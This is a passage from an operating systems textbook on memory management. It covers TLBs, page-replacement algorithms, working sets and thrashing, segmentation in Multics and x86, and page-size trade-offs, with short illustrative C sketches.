usual technique is to throw out the entry that hasn't been used the longest. This strategy, called
LRU (least-recently used) replacement is also implemented in hardware. The reason this
approach works so well is that most programs spend most of their time accessing a small set of
pages over and over again. For example, a program often spends a lot of time in an ``inner loop''
in one procedure. Even if that procedure, the procedures it calls, and so on are spread over 40K
bytes, 10 TLB entries will be sufficient to describe all these pages, and there will be no TLB misses
provided the TLB has at least 10 entries. This phenomenon is called locality. In practice, the TLB
hit rate for instruction references is extremely high. The hit rate for data references is also good,
but can vary widely for different programs.
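The lookup-then-fill behaviour can be sketched as follows, reusing PAGE_SHIFT and OFFSET_MASK from the earlier sketch; the table names and the helpers walk_page_table and tlb_insert are hypothetical, and a real TLB does the search and the LRU bookkeeping in hardware rather than in a loop.

struct tlb_entry { int valid; unsigned long vpn; unsigned long frame; unsigned prot; };
extern struct tlb_entry tlb[];
extern const int NTLB;
extern unsigned long walk_page_table(unsigned long vpn);        /* any of the schemes above */
extern void tlb_insert(unsigned long vpn, unsigned long frame); /* evicts the LRU entry */

unsigned long translate_with_tlb(unsigned long vaddr) {
    unsigned long vpn = vaddr >> PAGE_SHIFT;
    unsigned long off = vaddr & OFFSET_MASK;

    for (int i = 0; i < NTLB; i++)                 /* hardware checks all entries at once */
        if (tlb[i].valid && tlb[i].vpn == vpn)
            return (tlb[i].frame << PAGE_SHIFT) | off;   /* TLB hit */

    unsigned long frame = walk_page_table(vpn);    /* TLB miss: do it the hard way */
    tlb_insert(vpn, frame);                        /* remember it for next time */
    return (frame << PAGE_SHIFT) | off;
}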
If the TLB performs well enough, it almost doesn't matter how TLB misses are resolved. The
IBM PowerPC and the HP Spectrum use inverted page tables organized as hash tables in
conjunction with a TLB. The MIPS computers (MIPS is now a division of Silicon Graphics) get
rid of hardware page tables altogether. A TLB miss causes an interrupt, and it is up to the OS to
search the page table and load the appropriate entry into the TLB. The OS typically uses an
inverted page table implemented as a software hash table.
Two processes may map the same page number to different page frames. Since the TLB
hardware searches for an entry by page number, there would be an ambiguity if entries
corresponding to two processes were in the TLB at the same time. There are two ways around
this problem. Some systems simply flush the TLB (set a bit in all entries marking them as
unused) whenever they switch processes. This is very expensive, not because of the cost of
flushing the TLB, but because of all the TLB misses that will happen when the new process
starts running. An alternative approach is to add a process identifier to each entry. The hardware
then searches for the concatenation of the page number and the process id of the current
process.
We mentioned earlier that each page-table entry contains a ``valid'' bit as well as some other bits.
These other bits include the following.
• Protection. At a minimum, one bit to flag the page as read-only or read/write. Sometimes more bits to indicate whether the page may be executed as instructions, etc.
• Modified. This bit, usually called the dirty bit, is set whenever the page is referenced by a write (store) operation.
• Referenced. This bit is set whenever the page is referenced for any reason, whether load or store. We will see in the next section how these bits are used.
Page Replacement
All of these hardware methods for implementing paging have one thing in common: When the
CPU generates a virtual address for which the corresponding page table entry is marked invalid,
the MMU generates a page fault interrupt and the OS must handle the fault as explained above.
The OS checks its tables to see why it marked the page as invalid. There are (at least) three possible reasons:
• There is a bug in the program being run. In this case the OS simply kills the program (``memory fault -- core dumped'').
• UNIX treats a reference just beyond the end of a process' stack as a request to grow the stack. In this case, the OS allocates a page frame, clears it to zeros, and updates the MMU's page tables so that the requested page number points to the allocated frame.
• The requested page is on disk but not in memory. In this case, the OS allocates a page frame, copies the page from disk into the frame, and updates the MMU's page tables so that the requested page number points to the allocated frame.
In all but the first case, the OS is faced with the problem of choosing a frame. If there are any
unused frames, the choice is easy, but that will seldom be the case. When memory is heavily
used, the choice of frame is crucial for decent performance.
We will first consider page-replacement algorithms for a single process, and then consider
algorithms to use when there are multiple processes, all competing for the same set of frames.
Frame Allocation for a Single Process
• FIFO. (First-in, first-out) Keep the page frames in an ordinary queue, moving a frame to the tail of the queue when it is loaded with a new page, and always choose the frame at the head of the queue for replacement. In other words, use the frame whose page has been in memory the longest. While this algorithm may seem at first glance to be reasonable, it is actually about as bad as you can get. The problem is that a page that has been in memory for a long time could equally likely be ``hot'' (frequently used) or ``cold'' (unused), but FIFO treats them the same way. In fact FIFO is no better than, and may indeed be worse than
• RAND. (Random) Simply pick a random frame. This algorithm is also pretty bad.
• OPT. (Optimum) Pick the frame whose page will not be used for the longest time in the future. If there is a page in memory that will never be used again, its frame is obviously the best choice for replacement. Otherwise, if (for example) page A will be next referenced 8 million instructions in the future and page B will be referenced 6 million instructions in the future, choose page A. This algorithm is sometimes called Belady's MIN algorithm after its inventor. It can be shown that OPT is the best possible algorithm, in the sense that for any reference string (sequence of page numbers touched by a process), OPT gives the smallest number of page faults. Unfortunately, OPT, like SJF processor scheduling, is unimplementable because it requires knowledge of the future. Its only use is as a theoretical limit. If you have an algorithm you think looks promising, see how it compares to OPT on some sample reference strings.
• LRU. (Least Recently Used) Pick the frame whose page has not been referenced for the longest time. The idea behind this algorithm is that page references are not random. Processes tend to have a few hot pages that they reference over and over again. A page that has been recently referenced is likely to be referenced again in the near future. Thus LRU is likely to approximate OPT. LRU is actually quite a good algorithm. There are two ways of finding the least recently used page frame. One is to maintain a list. Every time a page is referenced, it is moved to the head of the list. When a page fault occurs, the least-recently used frame is the one at the tail of the list. Unfortunately, this approach requires a list operation on every single memory reference, and even though it is a pretty simple list operation, doing it on every reference is completely out of the question, even if it were done in hardware. An alternative approach is to maintain a counter or timer, and on every reference store the counter into a table entry associated with the referenced frame. On a page fault, search through the table for the smallest entry. This approach requires a search through the whole table on each page fault, but since page faults are expected to be tens of thousands of times less frequent than memory references, that's ok. A clever variant on this scheme is to maintain an n by n array of bits, initialized to 0, where n is the number of page frames. On a reference to page k, first set all the bits in row k to 1 and then set all bits in column k to zero. It turns out that if row k has the smallest value (when treated as a binary number), then frame k is the least recently used. Unfortunately, all of these techniques require hardware support and nobody makes hardware that supports them. Thus LRU, in its pure form, is just about as impractical as OPT. Fortunately, it is possible to get a good enough approximation to LRU (which is probably why nobody makes hardware to support true LRU).
• NRU. (Not Recently Used) There is a form of support that is almost universally provided by the hardware: Each page table entry has a referenced bit that is set to 1 by the hardware whenever the entry is used in a translation. The hardware never clears this bit to zero, but the OS software can clear it whenever it wants. With NRU, the OS arranges for periodic timer interrupts (say once every millisecond) and on each ``tick,'' it goes through the page table and clears all the referenced bits. On a page fault, the OS prefers frames whose referenced bits are still clear, since they contain pages that have not been referenced since the last timer interrupt. The problem with this technique is that the granularity is too coarse. If the last timer interrupt was recent, all the bits will be clear and there will be no information to distinguish frames from each other.
• SLRU. (Sampled LRU) This algorithm is similar to NRU, but before the referenced bit for a frame is cleared it is saved in a counter associated with the frame and maintained in software by the OS. One approach is to add the bit to the counter. The frame with the lowest counter value will be the one that was referenced in the smallest number of recent ``ticks''. This variant is called NFU (Not Frequently Used). A better approach is to shift the bit into the counter (from the left). The frame that hasn't been referenced for the largest number of ``ticks'' will be associated with the counter that has the largest number of leading zeros. Thus we can approximate the least-recently used frame by selecting the frame corresponding to the smallest value (in binary). (That will select the frame unreferenced for the largest number of ticks, and break ties in favor of the frame longest unreferenced before that.) This only approximates LRU for two reasons: It only records whether a page was referenced during a tick, not when in the tick it was referenced, and it only remembers the most recent n ticks, where n is the number of bits in the counter. We can get as close an approximation to true LRU as we like, at the cost of increasing the overhead, by making the ticks short and the counters very long.
• Second Chance. When a page fault occurs, look at the page frames one at a time, in order of their physical addresses. If the referenced bit is clear, choose the frame for replacement, and return. If the referenced bit is set, give the frame a ``second chance'' by clearing its referenced bit and going on to the next frame (wrapping around to frame zero at the end of memory). Eventually, a frame with a zero referenced bit must be found, since at worst, the search will return to where it started. Each time this algorithm is called, it starts searching where it last left off. This algorithm is usually called CLOCK because the frames can be visualized as being around the rim of an (analogue) clock, with the current location indicated by the second hand. A small sketch of this scan appears after this list.
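A minimal sketch of the CLOCK scan described in the last item; frames, NFRAMES, and the referenced field are invented names, and the handling of dirty pages discussed next is omitted.

struct frame_info { int referenced; /* plus other bookkeeping */ };
extern struct frame_info frames[];
extern const int NFRAMES;
static int hand = 0;                     /* position of the clock hand, kept across calls */

int choose_victim(void) {
    for (;;) {
        if (frames[hand].referenced == 0) {
            int victim = hand;           /* its second chance has been used up */
            hand = (hand + 1) % NFRAMES;
            return victim;
        }
        frames[hand].referenced = 0;     /* give it a second chance */
        hand = (hand + 1) % NFRAMES;
    }
}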
We have glossed over some details here. First, we said that when a frame is selected for
replacement, we have to copy its contents out to disk. Obviously, we can skip this step if the
page frame is unused. We can also skip the step if the page is ``clean,'' meaning that it has not
been modified since it was read into memory. Most MMU's have a dirty bit associated with each
page. When the MMU is setting the referenced bit for a page, it also sets the dirty bit if the
reference is a write (store) reference. Most of the algorithms above can be modified in an obvious way to prefer clean pages over dirty ones. For example, one version of NRU always prefers an unreferenced page over a referenced one, but within each category, it prefers clean over dirty pages. The CLOCK algorithm skips frames with either the referenced or the dirty bit set. However, when it encounters a dirty frame, it starts a disk-write operation to clean the frame. With this modification, we have to be careful not to get into an infinite loop. If the hand makes a complete circuit finding nothing but dirty pages, the OS simply has to wait until one of the page-cleaning requests finishes. Hopefully, this rarely if ever happens.
There is a curious phenomenon called Belady's Anomaly that comes up in some algorithms but
not others. Consider the reference string (sequence of page numbers) 0 1 2 3 0 1 4 0 1 2 3 4. If
we use FIFO with three page frames, we get 9 page faults, including the three faults to bring in
the first three pages, but with more memory (four frames), we actually get more faults (10).
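The anomaly is easy to reproduce with a few lines of C; this little simulation (all names are invented for the example) counts FIFO faults for the reference string above and prints 9 faults for three frames and 10 for four.

#include <stdio.h>

/* Count page faults under FIFO replacement with nframes frames. */
static int fifo_faults(const int *refs, int nrefs, int nframes) {
    int frames[16], next = 0, faults = 0;
    for (int i = 0; i < nframes; i++)
        frames[i] = -1;                            /* all frames start empty */
    for (int r = 0; r < nrefs; r++) {
        int hit = 0;
        for (int i = 0; i < nframes; i++)
            if (frames[i] == refs[r]) { hit = 1; break; }
        if (!hit) {
            frames[next] = refs[r];                /* replace the oldest page */
            next = (next + 1) % nframes;
            faults++;
        }
    }
    return faults;
}

int main(void) {
    int refs[] = { 0, 1, 2, 3, 0, 1, 4, 0, 1, 2, 3, 4 };
    printf("3 frames: %d faults\n", fifo_faults(refs, 12, 3));   /* 9 */
    printf("4 frames: %d faults\n", fifo_faults(refs, 12, 4));   /* 10 */
    return 0;
}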
Frame Allocation for Multiple Processes
Up to this point, we have been assuming that there is only one active process. When there are
multiple processes, things get more complicated. Algorithms that work well for one process can
give terrible results if they are extended to multiple processes in a naive way.
LRU would give excellent results for a single process, and all of the good practical algorithms
can be seen as ways of approximating LRU. A straightforward extension of LRU to multiple
processes still chooses the page frame that has not been referenced for the longest time.
However, that is a lousy idea. Consider a workload consisting of two processes. Process A is
copying data from one file to another, while process B is doing a CPU-intensive calculation on a
large matrix. Whenever process A blocks for I/O, it stops referencing its pages. After a while
process B steals all the page frames away from A. When A finally finishes with an I/O operation,
it suffers a series of page faults until it gets back the pages it needs, then computes for a very
short time and blocks again on another I/O operation.
There are two problems here. First, we are calculating the time since the last reference to a page
incorrectly. The idea behind LRU is ``use it or lose it.'' If a process hasn't referenced a page for a
long time, we take that as evidence that it doesn't want the page any more and re-use the frame
for another purpose. But in a multiprogrammed system, there may be two different reasons why
a process isn't touching a page: because it is using other pages, or because it is blocked. Clearly,
a process should only be penalized for not using a page when it is actually running. To capture
this idea, we introduce the notion of virtual time. The virtual time of a process is the amount of
CPU time it has used thus far. We can think of each process as having its own clock, which runs
only while the process is using the CPU. It is easy for the CPU scheduler to keep track of virtual
time. Whenever it starts a burst running on the CPU, it records the current real time. When an
interrupt occurs, it calculates the length of the burst that just completed and adds that value to the
virtual time of the process that was running. An implementation of LRU should record which
process owns each page, and record the virtual time its owner last touched it. Then, when
choosing a page to replace, we should consider the difference between the timestamp on a page
and the current virtual time of the page's owner. Algorithms that attempt to approximate LRU
should do something similar.
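The bookkeeping this implies is small; the sketch below uses invented structures (struct proc, struct vframe) and hook names to show where the scheduler and the replacement code would record and compare virtual times.

struct proc   { long virtual_time; long dispatched_at; };
struct vframe { struct proc *owner; long last_touch; };   /* owner's virtual time at last use */

void on_dispatch(struct proc *p, long real_now)  { p->dispatched_at = real_now; }
void on_preempt(struct proc *p, long real_now)   { p->virtual_time += real_now - p->dispatched_at; }
void on_reference(struct vframe *f)              { f->last_touch = f->owner->virtual_time; }

/* Replacement compares ages measured in each owner's own virtual time. */
long frame_age(const struct vframe *f)           { return f->owner->virtual_time - f->last_touch; }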
There is another problem with our naive multi-process LRU. The CPU-bound process B has an
unlimited appetite for pages, whereas the I/O-bound process A only uses a few pages. Even if we
calculate LRU using virtual time, process B might occasionally steal pages from A. Giving more
pages to B doesn't really help it run any faster, but taking from A a page it really needs has a
severe effect on A. A moment's thought shows that an ideal page-replacement algorithm for this
particular load would divide the page frames into two pools. Process A would get as many pages as it needs and B would get the rest. Each pool would be managed separately using LRU. That is, whenever B page
faults, it would replace the page in its pool that hadn't been referenced for the longest time.
In general, each process has a set of pages that it is actively using. This set is called the working
set of the process. If a process is not allocated enough memory to hold its working set, it will
cause an excessive number of page faults. But once a process has enough frames to hold its
working set, giving it more memory will have little or no effect.
Figure 5.6 Page frame allocation vs page fault rate
More formally, given a number τ, the working set with parameter τ of a process, denoted Wτ, is
the set of pages touched by the process during its most recent τ references to memory. Because
most processes have a very high degree of locality, the size of τ is not very important provided
it's large enough. A common choice of τ is the number of instructions executed in 1/2 second. In
other words, we will consider the working set of a process to be the set of pages it has touched
during the previous 1/2 second of virtual time. The Working Set Model of program behavior says
that the system will only run efficiently if each process is given enough page frames to hold its
working set. What if there aren't enough frames to hold the working sets of all processes? In this
case, memory is over-committed and it is hopeless to run all the processes efficiently. It would be
better to simply stop one of the processes and give its pages to others.
Another way of looking at this phenomenon is to consider CPU utilization as a function of the
level of multiprogramming (number of processes). With too few processes, we can't keep the
CPU busy. Thus as we increase the number of processes, we would like to see the CPU
utilization steadily improve, eventually getting close to 100%. Realistically, we cannot expect to do quite that well, but we would still expect increasing performance when we add more processes.
Figure 5.7 Number of process vs CPU utilization (a)
Unfortunately, if we allow memory to become over-committed, something very different may
happen:
Figure 5.8 Number of process vs CPU utilization (b)
After a point, adding more processes doesn't help because the new processes do not have enough
memory to run efficiently. They end up spending all their time page-faulting instead of doing
useful work. In fact, the extra page-fault load on the disk ends up slowing down other processes
until we reach a point where nothing is happening but disk traffic. This phenomenon is called
thrashing.
The moral of the story is that there is no point in trying to run more processes than will fit in
memory. When we say a process ``fits in memory,'' we mean that enough page frames have been
allocated to it to hold all of its working set. What should we do when we have more processes
than will fit? In a batch system (one where users drop off their jobs and expect them to be run
some time in the future), we can just delay starting a new job until there is enough memory to
hold its working set. In an interactive system, we may not have that option. Users can start
processes whenever they want. We still have the option of modifying the scheduler however. If
we decide there are too many processes, we can stop one or more processes (tell the scheduler
not to run them). The page frames assigned to those processes can then be taken away and given
to other processes. It is common to say the stopped processes have been ``swapped out'' by
analogy with a swapping system, since all of the pages of the stopped processes have been
moved from main memory to disk. When more memory becomes available (because a process
has terminated or because its working set has become smaller) we can ``swap in'' one of the
stopped processes. We could explicitly bring its working set back into memory, but it is
sufficient (and usually a better idea) just to make the process runnable. It will quickly bring its
working set back into memory simply by causing page faults. This control of the number of
active processes is called load control. It is also sometimes called medium-term scheduling as
contrasted with long-term scheduling, which is concerned with deciding when to start a new job,
and short-term scheduling, which determines how to allocate the CPU resource among the
currently active jobs.
It cannot be stressed too strongly that load control is an essential component of any good page-replacement algorithm. When a page fault occurs, we want to make a good decision on which
page to replace. But sometimes no decision is good, because there simply are not enough page
frames. At that point, we must decide to run some of the processes well rather than run all of
them very poorly.
This is a very good model, but it doesn't immediately translate into an algorithm. Various
specific algorithms have been proposed. As in the single process case, some are theoretically
good but unimplementable, while others are easy to implement but bad. The trick is to find a
reasonable compromise.
• Fixed Allocation. Give each process a fixed number of page frames. When a page fault occurs, use LRU or some approximation to it, but only consider frames that belong to the faulting process. The trouble with this approach is that it is not at all obvious how to decide how many frames to allocate to each process. If you give a process too few frames, it will thrash. If you give it too many, the extra frames are wasted; you would be better off giving those frames to another process, or starting another job (in a batch system). In some environments, it may be possible to statically estimate the memory requirements of each job. For example, a real-time control system tends to run a fixed collection of processes for a very long time. The characteristics of each process can be carefully measured and the system can be tuned to give each process exactly the amount of memory it needs. Fixed allocation has also been tried with batch systems: Each user is required to declare the memory allocation of a job when it is submitted. The customer is charged both for memory allocated and for I/O traffic, including traffic caused by page faults. The idea is that the customer has the incentive to declare the optimum size for his job. Unfortunately, even assuming good will on the part of the user, it can be very hard to estimate the memory demands of a job. Besides, the working-set size can change over the life of the job.
• Page-Fault Frequency (PFF). This approach is similar to fixed allocation, but the allocations are dynamically adjusted. The OS continuously monitors the fault rate of each process, in page faults per second of virtual time. If the fault rate of a process gets too high, either give it more pages or swap it out. If the fault rate gets too low, take some pages away. When you get back enough pages this way, either start another job (in a batch system) or restart some job that was swapped out. This technique is actually used in some existing systems. The problem is choosing the right values of ``too high'' and ``too low.'' You also have to be careful to avoid an unstable system, where you are continually stealing pages from a process until it thrashes and then giving them back.
• Working Set. The Working Set (WS) algorithm (as contrasted with the working set model) is as follows: Constantly monitor the working set (as defined above) of each process. Whenever a page leaves the working set, immediately take it away from the process and add its frame to a pool of free frames. When a process page faults, allocate it a frame from the pool of free frames. If the pool becomes empty, we have an overload situation--the sum of the working set sizes of the active processes exceeds the size of physical memory--so one of the processes is stopped. The problem is that WS, like SJF or true LRU, is not implementable. A page may leave a process' working set at any time, so the WS algorithm would require the working set to be monitored on every single memory reference. That's not something that can be done by software, and it would be totally impractical to build special hardware to do it. Thus all good multi-process paging algorithms are essentially approximations to WS.
• Clock. Some systems use a global CLOCK algorithm, with all frames, regardless of current owner, included in a single clock. As we said above, CLOCK approximates LRU, so global CLOCK approximates global LRU, which, as we said, is not a good algorithm. However, by being a little careful, we can fix the worst failing of global clock. If the clock ``hand'' is moving too ``fast'' (i.e., if we have to examine too many frames before finding one to replace on an average call), we can take that as evidence that memory is over-committed and swap out some process.
• WSClock. An interesting algorithm has been proposed (but not, to the best of my knowledge, widely implemented) that combines some of the best features of WS and CLOCK. Assume that we keep track of the current virtual time VT(p) of each process p. Also assume that in addition to the reference and dirty bits maintained by the hardware for each page frame i, we also keep track of process[i] (the identity of the process that owns the page currently occupying the frame) and LR[i] (an approximation to the time of the last reference to the frame). The time stamp LR[i] is expressed as the last reference time according to the virtual time of the process that owns the frame.
In the flowchart below, the WS parameter (the size of the window in virtual time used to determine whether a page is in the working set) is denoted by the Greek letter tau. The parameter F is the number of frames--i.e., the size of physical memory divided by the page size. Like CLOCK, WSClock walks through the frames in order, looking for a good candidate for replacement, clearing the reference bits as it goes. If the frame has been referenced since it was last inspected, it is given a ``second chance''. (The counter LR[i] is also updated to indicate that the page has been referenced recently in terms of the virtual time of its owner.) If not, the page is given a ``third chance'' by seeing whether it appears to be in the working set of its owner.
Figure 5.9 CLOCK algorithm flowchart
The time since its last reference is approximately calculated by subtracting LR[i] from the current (virtual) time. If the result is less than the parameter tau, the frame is passed over. If the page fails this test, it is either used immediately or scheduled for cleaning (writing its contents out to disk and clearing the dirty bit) depending on whether it is clean or dirty. There is one final complication: If a frame is about to be passed over because it was referenced recently, the algorithm checks whether the owning process is active, and takes the frame anyhow if not. This extra check allows the algorithm to grab the pages of processes that have been stopped by the load-control algorithm. Without it, pages of stopped processes would never get any ``older'' because the virtual time of a stopped process stops advancing.
Like CLOCK, WSClock has to be careful to avoid an infinite loop. As in the CLOCK algorithm, it may make a complete circuit of the clock finding only dirty candidate pages. In that case, it has to wait for one of the cleaning requests to finish. It may also find that all pages are unreferenced but "new" (the reference bit is clear but the comparison to tau shows the page has been referenced recently). In either case, memory is overcommitted and some process needs to be stopped. A sketch of one inspection step of this scan follows.
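One inspection step of that scan might look like the sketch below, reusing struct proc from the virtual-time sketch earlier; the arrays reference, dirty, process, and LR follow the names used above, while is_active and schedule_cleaning are invented helpers, and the loop-termination cases just described are left to the caller.

extern int reference[], dirty[];
extern struct proc *process[];
extern long LR[];
extern int  is_active(struct proc *p);
extern void schedule_cleaning(int frame);

/* Inspect frame i; return i if it can be claimed now, or -1 to move on to the next frame. */
int wsclock_inspect(int i, long tau) {
    struct proc *p = process[i];
    if (reference[i]) {                          /* referenced since last visit: second chance */
        reference[i] = 0;
        LR[i] = p->virtual_time;                 /* "now" in the owner's virtual time */
        if (is_active(p))
            return -1;                           /* pass over; the owner is still running */
    } else if (is_active(p) && p->virtual_time - LR[i] < tau) {
        return -1;                               /* third chance: still in the owner's working set */
    }
    if (dirty[i]) {
        schedule_cleaning(i);                    /* write it out; reconsider on a later pass */
        return -1;
    }
    return i;                                    /* clean and not recently needed: take it */
}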
5.4 Virtual Memory
In accord with the beautification principle, paging makes the main memory of the computer look more ``beautiful'' in several ways.
• It gives each process its own virtual memory, which looks like a private version of the main memory of the computer. In this sense, paging does for memory what the process abstraction does for the CPU. Even though the computer hardware may have only one CPU (or perhaps a few CPUs), each ``user'' can have his own private virtual CPU (process). Similarly, paging gives each process its own virtual memory, which is separate from the memories of other processes and protected from them.
• Each virtual memory looks like a linear array of bytes, with addresses starting at zero. This feature simplifies relocation: Every program can be compiled under the assumption that it will start at address zero.
• It makes the memory look bigger, by keeping infrequently used portions of the virtual memory space of a process on disk rather than in main memory. This feature both promotes more efficient sharing of the scarce memory resource among processes and allows each process to treat its memory as essentially unbounded in size. Just as a process doesn't have to worry about doing some operation that may block because it knows that the OS will run some other process while it is waiting, it doesn't have to worry about allocating lots of space to a rarely (or sparsely) used data structure because the OS will only allocate real memory to the part that's actually being used.
5.5 Segmentation
Segmentation carries this feature one step further by allowing each process to have multiple
``simulated memories.'' Each of these memories (called a segment) starts at address zero, is
independently protected, and can be separately paged. In a segmented system, a memory address
has two parts: a segment number and a segment offset. Most systems have some sort of
segmentation, but often it is quite limited. UNIX has exactly three segments per process. One
segment (called the text segment) holds the executable code of the process. It is generally read-only, fixed in size when the process starts, and shared among all processes running the same program. Sometimes read-only data (such as constants) are also placed in this segment. Another
segment (the data segment) holds the memory used for global variables. Its protection is
read/write (but usually not executable), and is normally not shared between processes. There is a
special system call to extend the size of the data segment of a process. The third segment is the
stack segment. As the name implies, it is used for the process' stack, which is used to hold
information used in procedure calls and returns (return address, saved contents of registers, etc.)
as well as local variables of procedures. Like the data segment, the stack is read/write but usually
not executable. The stack is automatically extended by the OS whenever the process causes a
fault by referencing an address beyond the current size of the stack (usually in the course of a
procedure call). It is not shared between processes. Some variants of UNIX have a fourth
segment, which contains part of the OS data structures. It is read-only and shared by all
processes.
Many application programs would be easier to write if they could have as many segments as they
liked. As an example of an application program that might want multiple segments, consider a
compiler. In addition to the usual text, data, and stack segments, it could use one segment for the
source of the program being compiled, one for the symbol table, etc. Breaking the address space
up into segments also helps sharing. For example, most programs in UNIX include the library
program printf. If the executable code of printf were in a separate segment, that segment could
easily be shared by multiple processes, allowing (slightly) more efficient sharing of physical
memory.
If you think of the virtual address as being the concatenation of the segment number and the
segment offset, segmentation looks superficially like paging. The main difference is that the
application programmer is aware of the segment boundaries, but can ignore the fact that the
address space is divided up into pages.
The implementation of segmentation is also superficially similar to the implementation of
paging. The segment number is used to index into a table of ``segment descriptors,'' each of
which contains the length and starting address of a segment as well as protection information. If
the segment offset is not less than the segment length, the MMU traps with a segmentation
violation. Otherwise, the segment offset is added to the starting address in the descriptor to get
the resulting physical address. There are several differences between the implementation of
segments and pages, all derived from the fact that the size of a segment is variable, while the size
of a page is ``built-in.''
• The size of the segment is stored in the segment descriptor and compared with the segment offset. The size of a page need not be stored anywhere because it is always the same. It is always a power of two and the page offset has just enough bits to represent any legal offset, so it is impossible for the page offset to be out of bounds. For example, if the page size is 4K (4096) bytes, the page offset is a 12-bit field, which can only contain numbers in the range 0...4095.
• The segment descriptor contains the physical address of the start of the segment. Since all page frames are required to start at an address that is a multiple of the page size, which is a power of two, the low-order bits of the physical address of a frame are always zero. For example, if pages are 4K bytes, the physical address of each page frame ends with 12 zeros. Thus a page table entry contains a frame number, which is just the high-order bits of the physical address of the frame, and the MMU concatenates the frame number with the page offset, as contrasted with adding the physical address of a segment to the segment offset.
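A sketch of the descriptor lookup and bounds check just described, ignoring paging of the segment; seg_desc_t, seg_table, and raise_segmentation_violation are invented names used only for the illustration.

typedef struct {
    unsigned long base;        /* physical address of the start of the segment */
    unsigned long length;      /* length of the segment in bytes */
    unsigned      prot;        /* protection bits */
} seg_desc_t;

extern seg_desc_t seg_table[];
extern void raise_segmentation_violation(unsigned seg, unsigned long offset);

unsigned long translate_segmented(unsigned seg, unsigned long offset) {
    seg_desc_t d = seg_table[seg];
    if (offset >= d.length)
        raise_segmentation_violation(seg, offset);   /* offset is out of bounds */
    return d.base + offset;    /* add, rather than concatenate as paging does */
}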
5.6 Implementation
Multics
One of the advantages of segmentation is that each segment can be large and can grow
dynamically. To get this effect, we have to page each segment. One way to do this is to have
each segment descriptor contain the (physical) address of a page table for the segment rather than
the address of the segment itself. This is the way segmentation works in Multics, the granddaddy
of all modern operating systems and a pioneer of the idea of segmentation. Multics ran on the
General Electric (later Honeywell) 635 computer, which was a 36-bit word-addressable machine,
which means that memory is divided into 36-bit words, with consecutive words having addresses
that differ by 1 (there were no bytes). A virtual address was 36 bits long, with the high 18 bits
interpreted as the segment number and the low 18 bits as segment offset. Although 18 bits allows
a maximum size of 2^18 = 262,144 words, the software enforced a maximum segment size of 2^16 =
65,536 words. Thus the segment offset is effectively 16 bits long. Associated with each process
is a table called the descriptor segment. There is a register called the Descriptor Segment Base
Register (DSBR) that points to it and a register called the Descriptor Segment Length Register
(DSLR) that indicates the number of entries in the descriptor segment.
Figure 5.10 Implementation of memory allocation in Multics
First the segment number in the virtual address is used to index into the descriptor segment to
find the appropriate descriptor. (If the segment number is too large, a fault occurs). The
descriptor contains permission information, which is checked to see if the current process has
rights to access the segment as requested. If that check succeeds, the memory address of a page
table for the segment is found in the descriptor. Since each page is 1024 words long, the 16-bit
segment offset is interpreted as a 6-bit page number and a 10-bit offset within the page. The page
number is used to index into the page table to get an entry containing a valid bit and frame
number. If the valid bit is set, the physical address of the desired word is found by concatenating
the frame number with the 10-bit page offset from the virtual address.
Actually, we have left out one important detail to simplify the description. The ``descriptor
segment'' really is a segment, which means it really is paged, just like any other segment. Thus
there is another page table that is the page table for the descriptor segment. The 18-bit segment
number from the virtual address is split into an 8-bit page number and a 10-bit offset. The page
number is used to select an entry from the descriptor segment's page table. That entry contains
the physical address of a page of the descriptor segment, and the page-offset field of the segment
number is used to index into that page to get the descriptor itself. The rest of the translation
occurs as described in the preceding paragraph. In total, each memory reference turns into four
accesses to memory:
• one to retrieve an entry from the descriptor segment's page table,
• one to retrieve the descriptor itself,
• one to retrieve an entry from the page table for the desired segment, and
• one to load or store the desired data.
Multics used a TLB mapping the segment number and page number within the segment to a page
frame to avoid three of these accesses in most cases.
Intel x86
The Intel 386 (and subsequent members of the x86 family used in personal computers) uses a
different approach to combining paging with segmentation. A virtual address consists of a 16-bit
segment selector and a 16 or 32-bit segment offset. The selector is used to fetch a segment
descriptor from a table (actually, there are two tables and one of the bits of the selector is used to
choose which table). The 64-bit descriptor contains the 32-bit address of the segment (called the
segment base), 21 bits indicating its length, and miscellaneous bits indicating protections and
other options. The segment length is indicated by a 20-bit limit and one bit to indicate whether
the limit should be interpreted as bytes or pages. (The segment base and limit ``fields'' are
actually scattered around the descriptor to provide compatibility with earlier versions of the
hardware.) If the offset from the original virtual address does not exceed the segment length, it is
added to the base to get a ``physical'' address called the linear address. If paging is turned off, the linear address really is the physical address. Otherwise, it is translated by a two-level page table as described previously, with the 32-bit address divided into two 10-bit page numbers and a 12-bit offset (a page is 4K on this machine).
We have to say ``generally'' here and elsewhere when we talk about UNIX because there are
many variants of UNIX in existence. Sometimes we will use the term ``classic UNIX'' to describe
the features that were in UNIX before it spread to many distinct dialects. Features in classic
UNIX are generally found in all of its dialects. Sometimes features introduced in one variant
became so popular that they were widely imitated and are now available in most dialects.
This is a good example of one of those ``popular'' features not in classic UNIX but in most modern
variants: System V (an AT&T variant of UNIX) introduced the ability to map a chunk of virtual
memory into the address spaces of multiple processes at some offset in the data segment
(perhaps a different offset in each process). This chunk is called a ``shared memory segment,''
but is not a segment in the sense we are using the term here. So-called ``System V shared
memory'' is available in most current versions of UNIX.
Many variants of UNIX get a similar effect with so-called ``shared libraries,'' which are
implemented with shared memory but without general-purpose segmentation support.
Paging Details
Real-world hardware CPUs have all sorts of ``features'' that make life hard for people trying to
write page-fault handlers in operating systems. Among the practical issues are the following.
Page Size
How big should a page be? This is really a hardware design question, but since it depends on OS
considerations, we will discuss it here. If pages are too large, lots of space will be wasted by
internal fragmentation: A process only needs a few bytes, but must take a full page. As a rough
estimate, about half of the last page of a process will be wasted on the average. Actually, the
average waste will be somewhat larger, if the typical process is small compared to the size of a
page. For example, if a page is 8K bytes and the typical process is only 1K, 7/8 of the space will
be wasted. Also, the relative amount of waste as a percentage of the space used depends on the
size of a typical process. All these considerations imply that as typical processes get bigger and
bigger, internal fragmentation becomes less and less of a problem.
On the other hand, with smaller pages it takes more page table entries to describe a given
process, leading to space overhead for the page tables, but more importantly time overhead for
any operation that manipulates them. In particular, it adds to the time needed to switch from one
process to another. The details depend on how page tables are organized. For example, if the
page tables are in registers, those registers have to be reloaded. A TLB will need more entries to
cover the same size ``working set,'' making it more expensive and requiring more time to re-load
the TLB when changing processes. In short, all current trends point to larger and larger pages in
the future.
If space overhead is the only consideration, it can be shown that the optimal size of a page is
sqrt(2se), where s is the size of an average process and e is the size of a page-table entry. This
calculation is based on balancing the space wasted by internal fragmentation against the space
used for page tables. This formula should be taken with a big grain of salt however, because it
overlooks the time overhead incurred by smaller pages.
